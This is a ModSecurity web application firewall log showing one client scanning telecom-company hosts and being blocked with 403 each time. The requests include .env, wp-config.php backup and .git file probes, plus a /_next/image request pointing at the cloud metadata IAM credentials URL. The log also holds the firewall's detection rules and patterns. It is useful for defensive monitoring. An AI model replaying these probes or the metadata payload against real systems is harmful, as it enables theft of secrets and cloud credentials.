[Mon May 11 15:23:16.123483 2026] [security2:error] [pid 1319886:tid 1319906] [client 195.178.110.133:3054] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYRKy-5-wpj6Sx56aYxQAAAAU"]
[Mon May 11 15:23:16.123924 2026] [security2:error] [pid 1319886:tid 1319906] [client 195.178.110.133:3054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYRKy-5-wpj6Sx56aYxQAAAAU"]
[Mon May 11 15:23:16.253070 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYRKt2WtvoFr7xvGzUhQAAAIs"]
[Mon May 11 15:23:16.253218 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYRKt2WtvoFr7xvGzUhQAAAIs"]
[Mon May 11 15:23:16.253443 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYRKt2WtvoFr7xvGzUhQAAAIs"]
[Mon May 11 15:23:16.253802 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:3370] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYRKy-5-wpj6Sx56aY0AAAAA0"]
[Mon May 11 15:23:16.253930 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:3370] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYRKy-5-wpj6Sx56aY0AAAAA0"]
[Mon May 11 15:23:16.256352 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:3370] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYRKy-5-wpj6Sx56aY0AAAAA0"]
[Mon May 11 15:23:16.257908 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYRFchVQ3tCn0m9OpZPQAAARA"]
[Mon May 11 15:23:16.258037 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYRFchVQ3tCn0m9OpZPQAAARA"]
[Mon May 11 15:23:16.258480 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:3382] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYROJEyNRN152ArOSM8QAAAFU"]
[Mon May 11 15:23:16.258610 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:3382] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYROJEyNRN152ArOSM8QAAAFU"]
[Mon May 11 15:23:16.260936 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:3382] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYROJEyNRN152ArOSM8QAAAFU"]
[Mon May 11 15:23:16.264671 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYRFchVQ3tCn0m9OpZPQAAARA"]
[Mon May 11 15:23:16.276795 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:3238] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYRKO9RdIr1DwxYR2S5QAAAME"]
[Mon May 11 15:23:16.276943 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:3238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYRKO9RdIr1DwxYR2S5QAAAME"]
[Mon May 11 15:23:16.277143 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:3238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYRKO9RdIr1DwxYR2S5QAAAME"]
[Mon May 11 15:23:16.277659 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.133:3348] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSM7wAAAEk"]
[Mon May 11 15:23:16.277786 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.133:3348] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSM7wAAAEk"]
[Mon May 11 15:23:16.278117 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.133:3316] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYRFchVQ3tCn0m9OpZQQAAAQ4"]
[Mon May 11 15:23:16.278279 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.133:3316] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYRFchVQ3tCn0m9OpZQQAAAQ4"]
[Mon May 11 15:23:16.278482 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.133:3316] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYRFchVQ3tCn0m9OpZQQAAAQ4"]
[Mon May 11 15:23:16.278779 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.133:3348] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSM7wAAAEk"]
[Mon May 11 15:23:16.280047 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.133:3294] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYROJEyNRN152ArOSM9AAAAFQ"]
[Mon May 11 15:23:16.280198 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.133:3294] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYROJEyNRN152ArOSM9AAAAFQ"]
[Mon May 11 15:23:16.280399 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.133:3294] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYROJEyNRN152ArOSM9AAAAFQ"]
[Mon May 11 15:23:16.281243 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:3382] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.conge.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYROJEyNRN152ArOSM9gAAAFU"]
[Mon May 11 15:23:16.281897 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:3382] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYROJEyNRN152ArOSM9gAAAFU"]
[Mon May 11 15:23:16.282106 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:3382] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYROJEyNRN152ArOSM9gAAAFU"]
[Mon May 11 15:23:16.282887 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYRFchVQ3tCn0m9OpZRAAAARA"]
[Mon May 11 15:23:16.283040 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYRFchVQ3tCn0m9OpZRAAAARA"]
[Mon May 11 15:23:16.283247 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYRFchVQ3tCn0m9OpZRAAAARA"]
[Mon May 11 15:23:16.287482 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYRKt2WtvoFr7xvGzUiwAAAIs"]
[Mon May 11 15:23:16.287616 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYRKt2WtvoFr7xvGzUiwAAAIs"]
[Mon May 11 15:23:16.287863 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYRKt2WtvoFr7xvGzUiwAAAIs"]
[Mon May 11 15:23:16.288803 2026] [security2:error] [pid 1319953:tid 1319969] [client 195.178.110.133:3308] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYROSQ-m-m0ukSShuCHQAAAU4"]
[Mon May 11 15:23:16.288933 2026] [security2:error] [pid 1319953:tid 1319969] [client 195.178.110.133:3308] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYROSQ-m-m0ukSShuCHQAAAU4"]
[Mon May 11 15:23:16.290665 2026] [security2:error] [pid 1319885:tid 1319895] [client 195.178.110.133:3400] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZQgAAAQY"]
[Mon May 11 15:23:16.290817 2026] [security2:error] [pid 1319885:tid 1319895] [client 195.178.110.133:3400] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZQgAAAQY"]
